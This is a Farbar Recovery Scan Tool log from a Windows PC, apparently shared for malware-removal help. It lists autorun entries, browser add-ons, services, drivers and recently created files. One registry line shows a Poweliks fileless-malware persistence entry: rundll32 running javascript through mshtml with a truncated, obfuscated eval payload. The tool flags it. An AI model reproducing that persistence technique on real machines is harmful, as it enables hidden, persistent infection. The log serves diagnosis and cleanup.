HKLM\...\Run: [Daemon for Mouse Suite] => C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.EXE [99840 2010-07-29] (Primax Electronics Ltd.)
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-04-30] (LogMeIn, Inc.)
HKLM-x32\...\Run: [Power Manager Power Agenda] => C:\Program Files (x86)\ThinkPad\Utilities\DPMHost.EXE [75064 2010-07-28] ()
HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe [4351712 2011-07-13] (Lenovo, Inc.)
HKLM-x32\...\Run: [D-Link D-Link DWA-125] => C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe [1024000 2010-05-21] (D-Link Corp.)
HKLM-x32\...\Run: [WZCSLDR2] => C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe [122880 2010-04-21] (Wireless Service)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Display] => C:\Program Files (x86)\APC\PowerChute Personal Edition\DataCollectionLauncher.exe [284024 2012-01-24] (Schneider Electric)
HKLM-x32\...\Run: [EaseUs Watch] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe [70792 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [EaseUs Tray] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe [743560 2011-12-26] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG Secure Search\vprot.exe [2640408 2014-08-26] ()
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (CANON INC.)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [452272 2012-08-31] (CANON INC.)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_winlogonx64.dll (Citrix Online, LLC)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation)
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-606911418-3109034106-3922174115-1001\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-500\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\APC UPS Status.lnk
ShortcutTarget: APC UPS Status.lnk -> C:\Program Files (x86)\APC\PowerChute Personal Edition\Display.exe (Schneider Electric)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/webhp?rls=ig
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexbho.dll (CANON INC.)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssiea.dll No File
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO-x32: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssie.dll No File
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} ->  No File
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} -  No File
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll No File
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgppa.dll No File
Handler-x32: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgpp.dll No File
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Tcpip\..\Interfaces\{145F6C64-D76C-4A66-8658-02D842AE2435}: [NameServer] 8.8.8.8,8.8.4.4

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll (CANON INC.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [ndibdjnfmopecpmkdieinmbadjfpblof] - C:\ProgramData\AVG Secure Search\ChromeExt\18.1.0.443\avg.crx [2014-04-17]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 APC Data Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe [21880 2012-01-24] (Schneider Electric)
R2 APC UPS Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe [705912 2012-01-24] (Schneider Electric)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
S2 D_Link_DWA-125; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWZCSdS.exe [126976 2010-04-21] (Wireless Service) [File not signed]
S2 D_Link_DWA-125_WPS; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe [53248 2010-03-03] () [File not signed]
R2 EaseUS Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe [61064 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe [610888 2014-09-25] (Citrix Online, LLC)
R2 Guard Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe [23176 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [376144 2014-07-19] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [226640 2014-07-19] (LogMeIn, Inc.)
R2 LMS; C:\Program Files (x86)\Intel\AMT\LMS.exe [174616 2009-07-21] (Intel Corporation)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-04-30] (LogMeIn, Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 PelService; C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe [177152 2010-04-22] () [File not signed]
R2 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28672 2011-07-25] (Lenovo Group Limited) [File not signed]
R2 ThinkVantage Registry Monitor Service; C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]
S3 TVT Backup Service; C:\Program Files (x86)\Lenovo\Rescue and Recovery\rrservice.exe [1475896 2010-07-29] (Lenovo Group Limited)
R2 UNS; C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-21] (Intel Corporation)
R2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-11] (AVG Secure Search)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 anodlwf; C:\Windows\System32\DRIVERS\anodlwfx.sys [15872 2009-03-06] ()
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [270616 2014-07-02] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-08-11] (AVG Technologies)
R0 EUBAKUP; C:\Windows\System32\drivers\eubakup.sys [57480 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R0 EUBKMON; C:\Windows\System32\drivers\EUBKMON.sys [51336 2011-12-22] () [File not signed]
R1 EUDSKACS; C:\Windows\system32\drivers\eudskacs.sys [19592 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R1 EUFDDISK; C:\Windows\system32\drivers\EuFdDisk.sys [189576 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-04-30] (LogMeIn, Inc.)
S4 LMIRfsClientNP; No ImagePath
R1 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [93400 2014-10-01] (Malwarebytes Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-02] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
S3 netr28ux; C:\Windows\System32\DRIVERS\Dnetr28ux.sys [1119072 2010-05-05] (Ralink Technology Corp.)
R3 pelmouse; C:\Windows\System32\DRIVERS\pelmouse.sys [23040 2010-10-20] (TPMX Electronics Ltd.)
R3 pelusblf; C:\Windows\System32\DRIVERS\pelusblf.sys [33280 2010-12-22] (TPMX Electronics Ltd.)
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R3 TVTI2C; C:\Windows\System32\DRIVERS\Tvti2c.sys [41536 2009-07-02] (Lenovo (United States) Inc.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 15:12 - 2014-11-02 15:12 - 00000000 ____D () C:\Users\Deborah\Downloads\FRST-OlderVersion
2014-10-31 06:49 - 2014-10-31 06:49 - 05591672 _____ (Swearware) C:\Users\Deborah\Downloads\ComboFix.exe
2014-10-31 06:33 - 2014-10-31 06:33 - 00018772 _____ () C:\Users\Deborah\Downloads\DDS.txt
2014-10-31 06:33 - 2014-10-31 06:33 - 00005354 _____ () C:\Users\Deborah\Downloads\Attach.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00018772 _____ () C:\Users\Deborah\Desktop\dds.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00005354 _____ () C:\Users\Deborah\Desktop\attach.txt
2014-10-31 06:18 - 2014-10-31 06:18 - 00688992 ____R (Swearware) C:\Users\Deborah\Downloads\dds.com
2014-10-31 05:55 - 2014-10-31 05:57 - 00026686 _____ () C:\Users\Deborah\Downloads\Addition.txt
2014-10-31 05:52 - 2014-11-02 15:15 - 00019716 _____ () C:\Users\Deborah\Downloads\FRST.txt
2014-10-31 05:50 - 2014-11-02 15:14 - 00000000 ____D () C:\FRST
2014-10-31 05:50 - 2014-11-02 15:12 - 02114560 _____ (Farbar) C:\Users\Deborah\Downloads\FRST64.exe
2014-10-31 05:27 - 2014-10-31 05:27 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-31 05:25 - 2014-10-31 05:25 - 29458856 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-7u71-windows-i586.com
2014-10-31 05:24 - 2014-10-31 05:24 - 29727656 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-8u25-windows-i586.com
2014-10-31 04:59 - 2014-10-31 04:59 - 00001880 _____ () C:\Windows\PFRO.log
2014-10-31 04:15 - 2010-08-30 07:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-10-31 04:12 - 2014-10-31 04:16 - 00000000 ____D () C:\AdwCleaner
2014-10-30 20:00 - 2014-10-30 20:00 - 01375089 _____ () C:\Users\Deborah\Downloads\adwcleaner_3.311.exe
2014-10-29 15:01 - 2014-10-31 05:31 - 00000168 _____ () C:\Windows\setupact.log
2014-10-29 15:01 - 2014-10-29 15:01 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-27 12:12 - 2014-10-27 12:12 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Deborah\Downloads\tdsskiller.exe
2014-10-24 11:34 - 2014-10-31 06:28 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-22 09:46 - 2014-10-22 09:46 - 00000028 _____ () C:\Windows\SysWOW64\u
2014-10-21 09:54 - 2014-10-21 09:54 - 00000000 ____D () C:\Users\Deborah\AppData\Roaming\AVG2015
2014-10-21 09:51 - 2014-10-21 09:53 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-21 09:51 - 2014-10-21 09:51 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Avg
2014-10-21 09:46 - 2014-10-21 09:59 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Avg2015
2014-10-20 12:53 - 2014-10-20 12:53 - 00003856 _____ () C:\Windows\System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D}
2014-10-20 12:53 - 2014-10-20 12:53 - 00000000 _____ () C:\Windows\system32\qzmktxy.dll
2014-10-15 13:53 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:53 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:53 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:53 - 2014-08-18 22:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-15 13:53 - 2014-08-18 22:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-15 13:53 - 2014-08-18 22:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 13:53 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-15 13:53 - 2014-08-18 21:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2014-10-15 13:53 - 2014-08-18 21:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 13:53 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 13:53 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 13:53 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 13:53 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-15 13:53 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
